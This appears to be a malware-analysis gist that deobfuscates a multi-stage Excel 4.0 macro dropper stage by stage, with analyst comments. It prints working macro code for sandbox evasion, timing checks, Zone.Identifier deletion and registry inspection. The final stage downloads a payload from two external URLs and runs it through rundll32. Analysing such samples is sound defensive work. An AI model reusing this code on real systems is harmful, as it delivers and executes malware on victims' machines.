Skip to content

Instantly share code, notes, and snippets.

@miller-itsec
Created February 4, 2022 14:50
Show Gist options
  • Save miller-itsec/658ffd14fde040fcceb8ea28d093d30c to your computer and use it in GitHub Desktop.
Save miller-itsec/658ffd14fde040fcceb8ea28d093d30c to your computer and use it in GitHub Desktop.
Multi-Stage XLM

This multi-stage XLM downloads the second stage payload, only if an internet connection is present. It contains anti-analysis tricks, such as checking the real sleep length and removes second stage origin artifacts, such as the zone identifier.

SHA-256: 5f2adacaf4ecb00ed24dd9dfe355307d0d6e786e40c945ad4c6d1ae3a4835d2a Report: https://www.filescan.io/uploads/61fd39b19046890c53adaa11/reports/f0412948-2f44-4ad2-ad51-31d347e9dd56/overview

  • Stage 1: the entrypoint stage, FORMULA(crack) is the key cell to creating the next stage.
C51	pound=(VALUE("0"))
C52	=WHILE(pound<30)
C55	=COUNT(R46C3:R85C10) 
C56	arrivals=-1
C60	pound=pound+1
C61	crack=""
C63	=WHILE(arrivals<196)
C64	arrivals=arrivals+1
C65	=INDIRECT(ADDRESS(arrivals+56,18+pound))
C66	=IF(R65C3="ikhTQSvvltISB",SET.NAME("arrivals",196),SET.NAME("crack",crack&R65C3))
C68	=NEXT()
C72	=FORMULA(crack,ABSREF("R["&(pound-1)&"]C[0]",R79C3))
C73	=COUNT(R28C1:R75C2)
C74	
C75	=NEXT()
  • Stage 2. FORMULA(competent) is the key cell to creating the next stage.
[=GOTO(R102C3)]         ' jump to `[attacked=R80C3]`
[bench=0]
[athletes=0]
[grove=ROWS(cookies)]
[=WHILE(athletes<bottom)]
[ticket=-1]
[athletes=athletes+1]
[competent=""]
[=WHILE(ticket<500)]
[ticket=ticket+1]
[=INDIRECT(ADDRESS(ticket+loads,athletes+instruction,,,"Sheet1"))]
[=IF(R89C3>1000)]
[ticket=500]
[=ELSE()]
[healthy=MOD(bench,grove)+1]
[volunteers=INDEX(cookies,healthy)]
[bench=bench+1]
[competent=competent&CHAR(R89C3-volunteers)]
[=END.IF()]
[=NEXT()]
[=FORMULA(competent,ABSREF("R["&(athletes-1)&"]C[0]",positions))]
[=NEXT()]
[=RETURN()]
[attacked=R80C3]
[loads=99]
[instruction=5]
[cookies=R68C11:R77C11]     ' this fomula endswith :R77C11
[bottom=17]
[positions=R109C3]
[=attacked()]       ' back to [bench=0]
  • Stage 3: re-using attacked() function. The formula variable is still competent.
[=FORMULA(INT(ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."))+-309,R78C11)]        ' ALERT should return TRUE, INT(TRUE) = -1
R110C3:  [=ERROR(TRUE,R112C3)]       ' install an error handler cell R112C3
R111C3:  [=FORMULA(INT(FILE.DELETE(GET.DOCUMENT(2)&"\"&GET.WINDOW(31)&":Zone.Identifier"))+56,R79C11)]              ' delete extended stream :Zone.Identifier, which will be created by browser if the file is downloaded from the internet
R112C3:  [=IF(ISERROR(R111C3),CLOSE(FALSE),)]       ' if not downloaded from internet it will CLOSE the file and wont move forward, this is why it cannot be caught in an offline environment
[=FORMULA(INT(CALL("Xlcall32","Excel4","2JRJRR#",4,,2,288,65)=353)+-656,R80C11)]        ' Xlcall32.Excel4(4, 288, 65) invoke excel function SUM(288, 65), got 353
[=APP.MAXIMIZE()]
[=FORMULA(INT(AND(ISNUMBER(SEARCH("Win",GET.WORKSPACE(1))),GET.WORKSPACE(14)>390,GET.WORKSPACE(42),GET.WORKSPACE(19),GET.WORKSPACE(13)>800))+316,R81C11)]
[=NOW()]
[=WAIT(NOW()+"00:00:01")]
[=NOW()]        ' a well known XLM trick NOW(); WAIT(); NOW(), subtract to ensure WAIT really happened
[=FORMULA(INT((R118C3-R116C3)*100000>1)+320,R82C11)]
[loads=99]
[instruction=22]
[cookies=R78C11:R82C11]
[bottom=24]
[positions=R126C3]
[=attacked()]
  • Stage 4
 [p="C:\Users\Public\Documents\"]
 [=FOPEN(p&"wa4.txt",3)]
 [=WHILE(FSIZE(R127C3)<7746)]
[=FWRITE(R127C3,CHAR(RANDBETWEEN(33,125)))]
[=NEXT()]
[=FORMULA(INT(FSIZE(R127C3)=7746)+29,R83C11)]
[=FCLOSE(R127C3)]
[="EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security "&p&"icSz4h.txt /y"]
[=CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe",R133C3,0,5)]
[=WHILE(ISERROR(FILES(p&"icSz4h.txt")))]
[=WAIT(NOW()+"00:00:01")]
[=NEXT()]
 [=FOPEN(p&"icSz4h.txt")]
 [=FPOS(R138C3,215)]
 [=FREAD(R138C3,255)]
 [=FCLOSE(R138C3)]
 [=FILE.DELETE(p&"icSz4h.txt")]
 [=FORMULA(INT(ISNUMBER(SEARCH("""VBAWarnings""=dword:00000001",R140C3)))+301,R84C11)]
 [loads=99]
 [instruction=46]
 [cookies=R78C11:R84C11]
 [bottom=9]
 [positions=R150C3]
 [=attacked()]
  • Stage 5
[zzz="https://hrdgschool.com/logs.php"]
[xxx="https://allied-almansoor.com/logs.php"]
[=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,zzz,p&"f4myZ.txt",0,0)]
[=IF(R152C3<>0,,GOTO(R155C3))]
[=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,xxx,p&"f4myZ.txt",0,0)]
[a="ShellExecuteA"]
[b="C:\Windows\system32\rundll32.exe"]
[=CALL("Shell32",a,"JJCCCJJ",0,"open",b,p&"f4myZ.txt,DllRegisterServer ",0,5)]
[=CLOSE(FALSE)]
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment